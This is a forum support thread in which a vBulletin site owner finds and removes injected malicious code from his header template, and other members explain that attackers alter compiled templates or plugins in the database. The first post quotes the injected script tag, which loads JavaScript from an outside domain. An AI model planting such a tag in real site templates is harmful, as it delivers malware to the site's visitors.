We were hacked. Found the cure - tracking down the root cause

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Spinball
    Senior Member
    • Oct 2001
    • 589
    • 3.8.x

    We were hacked. Found the cure - tracking down the root cause

    Noticed when I hit the our site this morning that the JS was broken.
    Then I got an Avast malware error and saw that this code was in headerinclude template area:

    HTML Code:
    <link rel="alternate" type="application/rss+xml" title="AVForums.com RSS Feed" href="http://www.avforums.com/forums/external.php?type=RSS2" />
    <script type="text/javascript" src="http://www.veggiezjuly.org/eos.js?sscoo"></script>
    <script type="text/javascript" src="http://www.avforums.com/forums/clientscript/ame.js" >
    veggiezjuly is the hack which happened some time overnight.
    Closed the forums and started investigating. Nothing in Google.
    We hadn't had any file, template or plugin edits, unusual ftp access or control panel log activity showing for that period of time.
    Removing this from the headinglcude template fixed it:

    HTML Code:
    <if condition="$vboptions['externalrss']">
        <link rel="alternate" type="application/rss+xml" title="$vboptions[bbtitle] RSS Feed" href="external.php?type=RSS2" />
        <if condition="$show['foruminfo'] OR $show['threadinfo']">
            <link rel="alternate" type="application/rss+xml" title="$vboptions[bbtitle] - $foruminfo[title_clean] - RSS Feed" href="external.php?type=RSS2&amp;forumids=$foruminfo[forumid]" />
        </if>
    </if>
    Then we put that code back, but the veggiezjuly line didn't return.
    Still investigating.
    It's something relating to the external.php script.
    Stuart Wright, founder AVForums.com. [strike]13[/strike] 15 million posts and counting.
    vBulletin user from 2001. We stopped upgrading vB at 3.8.2 and sadly we're going no further.
  • Matthew Gordon
    Senior Member
    • May 2002
    • 3243
    • 1.1.x

    #2
    I doubt removing the code was the fix - rather, the act of saving the template in the Admin CP was the fix. A lot of hacks modify the compiled version of the template directly in the database, so saving the template in the Admin CP will recompile the template and remove the malicious code. Running this tool should clear up any other templates modified like this. This post details steps to finding other malicious code on your site. Make sure you are running the latest versions of vBulletin and any products/plugins that you are using.

    Comment

    • Spinball
      Senior Member
      • Oct 2001
      • 589
      • 3.8.x

      #3
      I agree. It was an SQL injection, I'm sure.
      Stuart Wright, founder AVForums.com. [strike]13[/strike] 15 million posts and counting.
      vBulletin user from 2001. We stopped upgrading vB at 3.8.2 and sadly we're going no further.

      Comment

      • fishunter
        New Member
        • Oct 2008
        • 1

        #4
        How can I 'save' the template file in admin CP as mentioned below?

        I ran this tool it said no templates needed recompiling but I am still getting the warning from avast. At a file level, nothing has been changed. I suspect it is the version in the database that has code injection/issue.
        How can I regenerate the elements in the database?

        Thanks,
        Greg

        Originally posted by Matthew Gordon
        I doubt removing the code was the fix - rather, the act of saving the template in the Admin CP was the fix. A lot of hacks modify the compiled version of the template directly in the database, so saving the template in the Admin CP will recompile the template and remove the malicious code. "


        "Running this tool should clear up any other templates modified like this. This post details steps to finding other malicious code on your site. Make sure you are running the latest versions of vBulletin and any products/plugins that you are using.
        "

        Comment

        • Matthew Gordon
          Senior Member
          • May 2002
          • 3243
          • 1.1.x

          #5
          You just edit the template affected and save it without touching anything. However, if the template recompiler tool didn't find it, I doubt saving it like that will either. Start looking elsewhere - plugins are also stored in the database and can be used to inject code into the HTML output.

          See this article for more information.

          Comment

          widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
          Working...